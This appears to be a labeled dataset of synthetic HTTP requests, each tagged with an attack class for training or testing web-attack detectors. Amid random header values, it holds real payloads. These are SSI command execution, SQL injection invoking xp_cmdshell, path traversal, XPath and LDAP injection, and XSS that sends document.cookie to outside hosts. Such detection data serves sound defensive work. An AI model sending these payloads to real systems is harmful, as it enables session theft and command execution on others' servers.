Authorization: ienL faSi=elneF
Range: 0493-406438
Referer: /gHnv6/goEh/4deco.pl
TE: chunked;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/0.5 (X11; U; Linux i386 0.6; ee-s1; rv:9.2.3) Gecko/87806255
UA-CPU: Sparc
UA-Disp: 5748,579,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 1.2 www.n9ilcoa.htm:763
Transfer-Encoding: identity
Upgrade: Ers2te/0.8, damj/3.3, yenst5/7.3, Asbtf/7.1
Warning: 814 www.hsOonn.js "iker" "Fri, 28 Jul 06 12:52:58 CET"
X-Forwarded-For: 182.65.143.99
X-Serial-Number: 015353495234
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46600
Start - Id: 40116
class: SSI
GET /ohntetiaieettwtros/mU3yBX-TZfC9PvBS9t/hkYjpeRa-tta@rb.Tq/eeiasnce/i3@ynhwpec9/dk9WPZ/Kgyietquoueehetret/2Da/hOnsscatofu.dll?Wm@Yuc6BUqb=wdeaguformZ+%3Dx%7CfiSeselike&spdIw=51&mklxlWizcdsov=eu%3Dsan%26e&7qxp_csZX5window.openieO=%284a%40id&kh=8Lotlocationsrcpkjesan+&dw0l=eota&aehJikaEg=crtq&cq=pmte3&nogjed=86266&slMxir=0074008069&hunenoeve=eeq%27praoorB%29mautoexecse%5Cl&symenEuywsr7mod=s0%25n7b&isunioitecc=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fls+-l++++%2Fhome%2Fm6ob%2Fety%22+++--%3E&Busr7etR8d=wPT HTTP/1.1
Host: 163.123.112.144:1
Connection: keep-alive
Accept: application/x-tar;q=0.2, application/*;q=0.8, text/*
Accept-Charset: x-mac-greek;q=0.9, iso-8859-5
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.7
Cache-Control: lssj5ds=o
Client-ip: 149.0.44.161
Cookie: neuMdlyvlwnI=1stasH8seg/3setsdo;e3iup=lW.P;reuo5littjr0=fnlhewmh
Cookie2: $Version="3"
Date: Sat, 29 Aug 09 03:22:51 GMT
ETag: W/"2pP93uTxOps6cWjVyp"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Sun, 04 Feb 07 08:02:34 CET
If-Unmodified-Since: Tue, 11 Apr 06 10:34:14 CET
If-Match: *
If-None-Match: "QBL6hjAmg7Mh1Slj"
If-Range: ".psjwGA0JiTgvL77NC"
Max-Forwards: 6
MIME-Version: 3.4
Pragma: Estetdo='5oUeiuoj'
Proxy-Authorization: 39sc yzdsdo8e=siekw
Authorization: lcb2Rh 8feofloz=9eso
Range: 01784-577,9-7,8678-
Referer: /e6jW/48Lq/s2i1/gi5dy.mpeg
TE: deflate;q=0.2,chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 2.0; as-ze; rv:6.6.2) Gecko/65641192
UA-CPU: 68000
UA-Disp: 383,862,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 768x931
Via: 3.6 www.dIrSe.png, 9.2 22.244.43.224, HTTP/2.7 www.lbiom4py.css:6
Transfer-Encoding: compress
Upgrade: uwekht/7.8, pbs/0.4, Iln/7.7, tec/5.7
Warning: 530 www.keiqse.jpeg "tjsEot3eeoicdet6rlc" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 3431591
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40116
Start - Id: 48229
class: XSS
PUT /qmrg@tObmailSM/etd3vsr4mOnl/wimeitne7mdjohnpKr/vuhri7aOfTuennl/ieJk/km7akoVHP9o05m3/ddI/maC3UbOmsy8S/kal93ehIgolidnniNl/k-0kXOV/jlWoaEn/3ItJId_B.css? HTTP/1.0
Content-Length: 40
Content-Language: h,t
Content-Encoding: deflate
Content-Location: /edi2re71/ooode8s0/egsln.jsp
Content-MD5: Zjh6Y2hUaXNhbGFqQWxydA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Nov 07 12:08:46 UTC
Last-Modified: Wed, 16 May 07 09:06:30 GMT
Host: 106.21.8.68
Connection: close
Accept: video/*;q=0.9
Accept-Charset: big5
Accept-Encoding: deflate;q=0.4
Accept-Language: *
Cache-Control: 7nseedh='3to'
Client-ip: 147.225.102.237
Cookie: ngLhe=nat;.6ZR=8;Fhtpz8p7eiur=4;D3l9rswne=69;i66=<div  style =    "   behaviour:  url([http://www.ch.com/script/nsNSmta.php]);     "    >
Cookie2: $Version="830"
Date: Tue, 19 Jun 07 23:47:53 UTC
ETag: W/"4XtK.Wq_WxNJF@pTG"
Expect: asewymrt=ttrdq
From: nioeyiS@ckteen.it
If-Modified-Since: Tue, 07 Jul 09 04:18:37 CET
If-Unmodified-Since: Fri, 16 Jan 09 04:27:43 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Sep 06 22:56:32 CET
Max-Forwards: 075
MIME-Version: 9.4
Pragma: xtteec=lAhwikre
Proxy-Authorization: Basic Z253dHM6YmVlZWVj
Authorization: Basic Z3Z1dHc6aWF1YQ==
Range: 2-22075
Referer: /tcaw6Ta/vsia/eit3.htm
TE: deflate,gzip,trailers
Trailer: TE
User-Agent: Mozilla/3.2 (Windows; U; WinNT 5.6; i5-ho; rv:2.6.6) Gecko/62164111
UA-CPU: PowerPC
UA-Color: color32
UA-Pixels: 5473x3534
Via: Oep/2.5 www.eooeft.jpeg:21794, HTTP/2.1 www.oesu.jpg
Transfer-Encoding: compress
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aIgaED=o6racoehcmolt&SdnLNjalhe=eNn20ic8

End - Id: 48229
Start - Id: 48525
class: XPathInjection
PUT /etsyiree1dewei/or-y71bSxI3FWpN/gmCt4eolltw/ptall@vghavingd4u962/iBDqeiaAy/uapone9/d9U7X.5OrJ/83uJ/ijydiU/nDg1Ezan3SYSTScaOfyC/t0ah/nheh2ivion.cgi? HTTP/1.1
Content-Length: 274
Content-Language: t,baZ,N
Content-Encoding: gzip
Content-Location: http://2aePmse.de/c6Oooje.swf
Content-MD5: dFluOG9kcXZveXVndWVydQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 May 05 17:36:13 CET
Last-Modified: Sat, 11 Feb 06 16:13:28 GMT
Host: www.ycseilCt.org:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: us-ascii, ks_c_5601-1987, windows-1255;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: a9efi9-aPt3oti;q=0.1, wokcoln5-uw;q=0.2, HbTtpgt-at;q=0.6, r-1twerl, bdhee-rut;q=0.8
Cache-Control: max-age=540
Client-ip: 221.85.134.126
Cookie: lwer7kot=triperlefoeecy2rmzlrn
Cookie2: $Version="5"
Date: Sat, 20 May 06 03:51:40 CET
ETag: W/"DH_rMCDx8@tWH@v-"
Expect: 100-continue
From: hpeced@ekqiej.it
If-Modified-Since: Tue, 20 Jun 06 05:22:41 CET
If-Unmodified-Since: Thu, 14 Apr 05 11:42:10 UTC
If-Match: *
If-None-Match: "maUElsYH51PTTjJhGFUz"
If-Range: Sun, 03 Jun 07 13:56:17 CET
Max-Forwards: 5248
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: mtlwdi eSfIe=ftEqwcOT
Authorization: NTLM bWFiZHMxMXJqaW80Znlpd2Zyc2VJc3l0eGV0MDYwbW5weQ==
Range: -97671,976035-235370,9-723
Referer: /7ll81/Apfd.tar
TE: deflate,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.6 (Machintosh; U; Mac OS X 8.4; 5u-aw; rv:7.7.9) Gecko/49804021
UA-CPU: x86
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7707x473
Via: cA45hr/7.7 56.175.38.33, 1.3 www.hc9h4t.tiff
Transfer-Encoding: gzip
Warning: 437 242.254.172.181 "wwyyel6" "Tue, 23 Aug 05 14:58:53 GMT"
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

BK8gCM6YfgVq=a.e&09tFruolE=o_qLbXi8d7nx&ohhou=75&UGMinputsPVx0d_Vt=73475682&4iblcieoootrs=1&3t8agOtgtsugnoo=zmD&eeNei=464&Qbgsound44R=3693     or  1<   sjc0z/ee/yx/child::text()[position()=54]     or   92976='] | /* | /foo[bar='

End - Id: 48525
Start - Id: 45994
class: PathTransversal
PUT /jobpEs3ivn9esw/gtcAz3ny.9Pm.jsp? HTTP/1.1
Content-Length: 93
Content-Language: h6egv,3l
Content-Encoding: deflate
Content-Location: http://eztpn.fr/bAeeolay/ni7haeG/woEvLee.mdb
Content-MD5: ZExuVXNzZm50dGVFdG9zbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Oct 09 20:40:38 GMT
Last-Modified: Tue, 31 May 05 02:01:28 GMT
Host: www.aShnLrs6ec.be:50
Connection: uissNen
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 243.169.251.155
Cookie: rniwniiIanp=../../../../../../../../../usr/yo.bat
Date: Mon, 08 Jan 07 11:29:24 GMT
ETag: "p3WzAfh_P6zD5i3SDkrV"
Expect: 100-continue
From: h4leog@lneuabul.uk
If-Modified-Since: Fri, 24 Dec 04 01:35:50 CET
If-Unmodified-Since: Tue, 17 Aug 04 10:30:57 GMT
If-Match: *
If-None-Match: "ILy_djoiX7VOzWt0"
If-Range: Tue, 22 Jan 08 10:41:54 UTC
Max-Forwards: 70
MIME-Version: 8.3
Pragma: no-cache
Authorization: wei9 ecsazo=ohenn
Range: 44665-,552-,1-
Referer: /dllteaQt.msf
TE: gzip,chunked;q=0.6,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: e2HkvcyvYt http://www.late8fS.it
UA-CPU: Sparc
Via: FTP/7.4 152.23.109.142
Transfer-Encoding: compress
Upgrade: twus/0.7, ocrDnh/8.5, foan/4.2, ouoa2e/5.5, zte/3.3
X-Serial-Number: 30022157350213308791
~~~~~: ~~~~~~~~~~~~~~~~

esf0dsdXn2nmse=xQFhdvwa&imgKo5c8H-F6qY=562&otwgeevdDce=yveset&16DhV1KkZ.f=entlq&phIe=02276416

End - Id: 45994
Start - Id: 47295
class: XSS
GET /iS5yAiO.exe?bF4itn=330&qoinartokeiX=703&rlnLlds=74540&cepst=55512682&onuptatzeAiian=eha&glnd=%3Cimg++src%3D%26%7B%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.iltrorni.com%2Fcgi-bin%2Ftrrinatait.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B+++%3E HTTP/1.1
Host: www.anoi2h0.biz
Connection: close
Accept: video/*;q=0.9
Accept-Charset: iso-2022-kr;q=0.5, x-mac-greek, iso-8859-9;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 159.5.195.74
Cookie: siia1ue4fpIi=14;Ooiaowsn=mo4gbtriatF HMici;5@n1rc=43Fdf;nenbnlih3ntxR=oief;VncallUQvarMSt=eiyrVlhoxX09
Cookie2: $Version="1"
Date: Sat, 05 Jun 04 08:13:41 GMT
ETag: W/"AQpxThuaVD2FZFjT"
Expect: ceoaioc=rs5n
From: etiosA@ol5yehtiwE.org
If-Modified-Since: Wed, 12 Dec 07 13:55:35 GMT
If-Unmodified-Since: Thu, 13 Mar 08 16:58:42 GMT
If-Match: *
If-None-Match: "mzCUGmBYEAbUBhyJftT"
If-Range: Fri, 11 Mar 05 15:25:06 UTC
Max-Forwards: 059
MIME-Version: 1.9
Pragma: v='insBwIv'
Proxy-Authorization: Digest realm
Authorization: rjne svdhj5us=dhtnra
Range: -4,7256-5,39-5314
Referer: http://www.rcds.cz/rvea3n/J3n1e/eipnc/ttt5acn.tiff
TE: trailers,trailers,deflate;q=0.9
Trailer: User-Agent
User-Agent: eyedpRAulcwwe7ey
UA-CPU: Sparc
UA-Disp: 7412,103,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5306x1733
Via: 5.3 10.250.186.184, FTP/5.4 129.12.128.189
Transfer-Encoding: compress
Upgrade: mtnf/1.5
Warning: 299 www.leto.html "eaiemdnssbtcpoo5ntb" "Fri, 25 Aug 06 10:41:44 GMT"
X-Forwarded-For: 7.96.3.255
X-Serial-Number: 1360027
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47295
Start - Id: 41068
class: SqlInjection
GET /ri3c6lCn/OP2quo8W6H/stnr1htcAeuotp/s0T.FVFTj_zY4.asmx?ootmt=4726153&SQXeval=22&l6uvnti1h=7&3-Zi2nT=lpswulefg&MArU8=%27%3BEXEC++master.dbo.xp_cmdshell+%27cmd.exe&samjaLos=lTgd6&oobp8LzlbXz=siindeleted%3Dn HTTP/1.0
Host: www.tncdy.net:12
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: shift_jis;q=0.4, x-mac-arabic;q=0.5, x-mac-ce;q=0.2, windows-1253;q=0.0
Accept-Encoding: identity;q=0.8, deflate
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 225.139.215.255
Cookie: txhettrjhvng6o9=429390299;enb=hc7p>1rel2ooit;inhis3e=hacj s[mmfsystemap  tt);4pzal4oiEatewt=satbu3on9;mailA3logBpTVhtpassOal= rs%;A5RSrm5Pl.=ieaeaseaectiltesd
Cookie2: $Version="049"
Date: Tue, 18 Sep 07 13:54:33 CET
ETag: W/"sUM3EPCj2Sen4b.1UGp-"
Expect: ttrhbztf
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Wed, 20 Apr 05 01:08:12 CET
If-Unmodified-Since: Wed, 18 May 05 09:40:38 UTC
If-Match: *
If-None-Match: *
If-Range: "jH.HSSGdokJL@Wxsx"
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: NTLM bWVzRGVua2F3c2xpYXNobm5obWFueU9hN3lwdHRsaWN0dA==
Range: -4
Referer: http://srcqil.de/trvoeqb/yo2hfyoo.php
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.4 (X11; U; Open BSD i386 7.9; 7D-Te; rv:0.2.6) Gecko/72761823
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7677x541
Via: FTP/1.4 www.HscrftE.html:780, ytJma/1.0 www.Xzyei.jpg
Transfer-Encoding: gzip
Upgrade: t1er/5.7
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41068
Start - Id: 47706
class: XSS
GET /asP3BlFD/438Ddtx1MBqZ/yg3Ti0whyisGLSA/useaarnrn5aXldn3tm/Une/4_0MnRQvZ/nYottunoninii5befkCo/r1SpTz92F3A.gif?cDolaehhvNs=+vnSxterm4&5iWI911Ke4tn=%3C%21--+--+--%3E%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F5.179.15.252%2Forlele.php3%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E%3C%21--+--+--%3E&WSTCPAIEx8I=0275&hamun=efiw&edzlAtlhndnog2a=o7tgeeir&ongaeee=droppyioed HTTP/1.1
Host: www.nnytli8dr.org:80
Connection: attsOge
Accept: text/xml, audio/*, video/*;q=0.3
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, compress, compress, gzip, identity
Accept-Language: astro-1doi5egn, 2iy-Tnyxc, djzt0er-z
Cache-Control: ujwhs=t
Client-ip: 29.159.169.244
Cookie: atnrrc=e;2tU@3=ssl4evalx~Yn;eiarteademlod=awSE3_AVssZ;orkspssasqca=q4KKrylZ@p;roorat9C7dcDnSi=9545077
Cookie2: $Version="6"
Date: Tue, 23 May 06 10:13:20 CET
ETag: W/"XsttvGY924rMZZs4W"
Expect: 5lAsc
From: rpelt@szm5Hecblb.uk
If-Modified-Since: Fri, 18 Jul 08 16:50:30 CET
If-Unmodified-Since: Fri, 04 Apr 08 06:01:16 GMT
If-Match: "qVzJxK5qr_enUQjK1vk"
If-None-Match: "3kdKpLMDr5QRM-SM4"
If-Range: Sat, 12 Aug 06 23:41:13 UTC
Max-Forwards: 74
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic Z25taGQ6ZXRhcm8=
Authorization: Digest uri=http://od8dtd.org/4nMIyhoa.pdf
Range: 37-9480,573294-46248,0850-768
Referer: /tdMsmNbe.tar
TE: trailers,trailers
Trailer: Accept
User-Agent: Sn9t (r3umKw; nMwGJwKVco; s.s6apD)
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: oa2ii; awdti5ty=rdkso3
Upgrade: rNtt/7.8, woes/8.3, tse/0.2, vktO0r/0.2, suere/2.3
Warning: 681 105.145.39.255 "iAonrneh" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 00056552698
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47706
Start - Id: 42293
class: SqlInjection
GET /oiCs34K6gMLePQ-CNa/iFi9/hf2nKeAC.cfm?uHfcoxdGshtl=hwRia&ea=5&mqbsooe5Turh=%27%29+++++UNION++ALL++SELECT+++++%27epe%27%2C463%2C8512%2C%27xopOtotni%27%2C6++FROM++++tncw++++WHERE++%28++%27%27+++%3D%27&AymC8drop4.=9029768&ttxa9yntitdwnh=8559111651&te=Irbnos&J-EVuKO0B=heh-nemochanacceptperltRkn%28+yHge&lnrr2nA=t&7qlf2OO1f2@=wai2tnqensUusftooa&rrwmr=1iyitetcoan&ltDxzsihatosoE=oj3&seuoidtnr=ow2sjM&UQp-=yTM5Y&rmcutswLdEaber=914654341&estonge=ttfl HTTP/1.0
Host: 178.82.184.125
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: utf-8;q=0.6, x-mac-arabic;q=0.4, iso-8859-8-i;q=0.3, windows-874
Accept-Encoding: 
Accept-Language: fal-edyctt
Cache-Control: no-cache
Client-ip: 87.181.200.43
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="095"
Date: Sun, 31 Oct 04 04:56:29 UTC
ETag: W/"17F1n2q6q2So7mxf"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Sun, 13 Sep 09 02:40:24 GMT
If-Unmodified-Since: Sun, 23 Nov 08 07:12:04 UTC
If-Match: "79N6weC8TiNHylJR"
If-None-Match: *
If-Range: Sun, 20 Apr 08 14:07:00 UTC
Max-Forwards: 544
MIME-Version: 2.3
Pragma: eih='6uK'
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: tusE HcFen=tbiuae
Range: -568889,-588214
Referer: /mhar/tmchAe.conf
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: EEeAhglgEdt
UA-CPU: 68000
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 443x7648
Via: HTTP/8.4 www.h8eedaq1.tiff:5411, 1.9 www.ahdeanUe.gif:400
Transfer-Encoding: wtaZya; iEiNota=sh2ite
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 539 www.diea.jpeg "Aotyhee" "Sun, 01 Feb 09 21:46:05 GMT"
X-Forwarded-For: 41.19.144.81
X-Serial-Number: 61789071021088545
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42293
Start - Id: 36909
class: LdapInjection
PUT /qOOlYdBXBxbvcpdzlT6/w2u/idBY..3jp/0x8.xW/3pU8bmhMU.php4? HTTP/1.1
Content-Length: 105
Content-Language: onhs
Content-Encoding: gzip
Content-Location: /Eme8ccn/bsipLio/att7ppcr/tdn9lal.mpeg
Content-MD5: bnR3Um9mY3Rhb2lpcmhPbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 31 Mar 06 03:25:17 UTC
Last-Modified: Fri, 25 May 07 06:00:44 UTC
Host: www.7l1d.it
Connection: iwSoWs
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesetrad, koi8-r;q=0.8, x-mac-greek, x-mac-arabic;q=0.9
Accept-Encoding: gzip, deflate;q=0.6, identity, gzip
Accept-Language: *;q=0.3
Cache-Control: uoadfol=osAE7n
Client-ip: 4.168.211.181
Cookie: ELsu3dbayt=nwa;zaszeuosred8nyc=87280;pEeg=ooa3atvvnaih
Cookie2: $Version="8"
Date: Sat, 05 Dec 09 03:53:16 UTC
ETag: "JjZImyztplyA4.bN-Dt"
Expect: 5nir
From: hrhrro@yuoTn2us.de
If-Modified-Since: Fri, 12 Nov 04 19:00:22 CET
If-Unmodified-Since: Tue, 06 Nov 07 21:21:48 CET
If-Match: *
If-None-Match: "p1@iPkWAkq9Qno3LQVw2"
If-Range: *
Max-Forwards: 3
MIME-Version: 8.8
Pragma: asM=tooe
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: NTLM YWJsdHhiaG1laXFpZG1sZG9ueW9zcWVjaDFiYXRjSHR0RGU=
Range: 03-
Referer: /osoqy8an/Ieo1u.swf
TE: gzip,trailers,trailers
Trailer: Warning
User-Agent: req2R1n http://www.ahirutoe.com
UA-CPU: Sparc
UA-OS: Win98
UA-Pixels: 015x0585
Via: HTTP/1.7 26.146.183.19
Transfer-Encoding: gzip
Upgrade: tn40Sc/6.9, 8ysiw/2.7, ehl4of/1.6
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

o8q7T70aBT_.U=)  ( |  (displayName=had*)    (name =   had*   )(    mail=had*    )

End - Id: 36909
Start - Id: 36113
class: PathTransversal
GET /9tsj7phEmG2DnM/K@MH.c/eXhc/2@cmd2j/on2rui/VuWYp/msussllo8/vtneydaOa/rs3xWtbrcpXecho/sTcaAY/aZwRN-yX.exe?Rfpuphpjhs=c9OjUhtCS&psSevaloEchildLEA=y%3A%5Cautoexec.bat&alfgBft=sb%40sh_w&stthhIdbSeaSai=a%24dropbr%3Bc%28reotm&xeidehiir=inputi1b&8e9fwp-2xmlHPX=ie4&-MfUe=4dqntcmH%3Ec4&y6aert2ps8gb=dsohlibysock_streamexecrilmie&hegat=ewqDCraT&hGgstnlriks=eT1RBq580vqb&tseh9e6stagc=33898276&gcdrEneseea=6546719577&ig7cne=kHu HTTP/1.0
Host: www.ttnlfhn6p.it:80
Connection: tlbnosex
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.5, compress;q=0.2
Accept-Language: mnis-elaem;q=0.5
Cache-Control: max-age=11286
Client-ip: 180.199.9.54
Cookie: ai1eya9E3=74546;ndhc=19437879;itEinsl0El=systemoselecthal=aInbncn\e ;qchnnhin=g52tneiieae;eei=9;l6=ndncddtdgtxyu
Cookie2: $Version="163"
Date: Fri, 25 May 07 02:20:31 CET
ETag: W/"lwclySd@piARZiDF"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Thu, 27 Mar 08 18:49:54 CET
If-Unmodified-Since: Fri, 22 Oct 04 18:45:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 642
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: 9844-66,0-,-297
Referer: http://td05vC.org/jsdt/al3x1q.asmx
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/5.9 (Windows; U; Win 9x 9.7; sn-wa; rv:3.4.4) Gecko/71586426
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: 4.3 www.nhwhomS5.gif, 4.8 www.eienh.js
Transfer-Encoding: bnDo
Upgrade: iormhs/9.8
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36113
Start - Id: 45986
class: PathTransversal
POST /tkms1eiwsc/9f@SRjOf8G4hn/a6VWoewZ03S@/EincludeQLRG/gceedoskGnck.cfm? HTTP/1.1
Content-Length: 8
Content-Language: ene
Content-Encoding: deflate
Content-Location: /n7EuDc/prsise2n/nishsis/isle/tOm6noSo.jpg
Content-MD5: Z3dlcXU2a2RJaGVhamlTbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Sep 09 06:50:07 GMT
Last-Modified: Mon, 23 Apr 07 18:41:59 UTC
Host: 238.46.64.172:80
Connection: close
Accept: audio/basic;q=0.9, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 250.34.233.65
Cookie: 4AkJ=33q
Cookie2: $Version="279"
Date: Tue, 16 May 06 15:34:35 CET
ETag: "iL.lhMF7FSpD_jLo"
Expect: vryairto=EsyalQi;presec=et2nWm
From: mtyt4ns@shaohiwie.it
If-Modified-Since: Fri, 04 May 07 08:19:16 UTC
If-Unmodified-Since: Thu, 16 Apr 09 15:26:10 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Nov 04 22:58:41 GMT
Max-Forwards: 70
Pragma: rw=in4eo
Proxy-Authorization: eelo uasuthoo=eyfL
Authorization: Basic SW12MHBmdG46dGhiYWVv
Range: -2042
Referer: http://enrequs.net/animuard/Yaucm5.htm
Trailer: User-Agent
User-Agent: \WINNT\system.ini
UA-Pixels: 705x843
Via: 4.8 239.215.32.163:3, tnn/7.2 137.84.172.128:06818
Warning: 353 209.10.48.69 "8etwz7eHAfen" 
X-Serial-Number: 9739986
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pTN=tce-

End - Id: 45986
Start - Id: 47285
class: XSS
GET /97ou2E/qussSsS/we/c6eNko/fdaTbU6GpTPDG3pR.aspx?AOGisRS-x=7y+sh&Wohomef=4585167262&odnt=eSg2&1abl8snb1nhFnj=ogaOfA&E2x2gkh5hssallw=-e&r7sesanet0o=13&yzd2mdieieourjg=%3Cimg+++++src++++%3D+++%22+++++javascript%3A++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.in.com%2Fcgi-bin%2Fngti.cgi%27%2Bdocument.cookie%29%3B%5D%22+%3E&nmt=%3A%2Bm&eiitr=lgtnyrCnt&hwgetEoZ5rCThavingPI=%3Enstu+&ntt=789687780 HTTP/1.1
Host: 4.113.30.184:18
Connection: hdpte4v
Accept: audio/*, audio/*, video/quicktime
Accept-Charset: euc-kr
Accept-Encoding: gzip, identity
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 150.123.138.85
Cookie: ietdp=io5t3mty5riD;nass2chnaofsst=cwrvHrrketvu(&a;svrNPu2vna=60274
Cookie2: $Version="26"
Date: Fri, 31 Mar 06 24:47:39 GMT
ETag: W/"qg7Nec_LMFRfrFT--w"
Expect: 100-continue
From: peTeu9@mayraae.fr
If-Modified-Since: Sun, 12 Oct 08 06:14:27 GMT
If-Unmodified-Since: Sat, 02 Jun 07 02:18:52 CET
If-Match: "WrKP27J.hjXxkUaeMc"
If-None-Match: "jhav@snYxsBoqBJs8YJ"
If-Range: Wed, 14 Jan 04 01:43:01 GMT
Max-Forwards: 7415
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: aoettc ieuvn1n=T1or
Authorization: Digest response="A7BB157Bcc54feF1FDD2ccAbdeeDadB0"
Range: -4,7256-5,39-5314
Referer: http://oEir2ktt.net/o9fne/hodlbm8e/3na0.bin
TE: deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/2.6 (Machintosh; U; PPC 3.4; ce-hE; rv:5.2.8) Gecko/87530472
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5730x315
Via: 0.1 75.95.34.184:322
Transfer-Encoding: identity
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 136.201.136.92
X-Serial-Number: 41548117703
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47285
Start - Id: 40741
class: SSI
GET /9eMnneiiptoz8itEonr/n4TPlfGJ@Gyadv7z/riTLlxEjx/_scriptH8BeR2/a1/eGzmVNEgKplV.Lfc-erM.pl?vmtl=m4traiam&N8nhrepbnoyojh=485&ahrhtzr2Eazes=ap+q%29sn8eiyw&upf=878 HTTP/1.1
Host: www.pseraeaA.it
Connection: tthgrjo
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, gzip;q=0.4
Accept-Language: af-eytn4e, iysme6le-nae8sr;q=0.4, aqnft-m5eho;q=0.3, N-h5utf;q=0.9, 2-etngL6e
Cache-Control: max-stale
Client-ip: 11.222.96.198
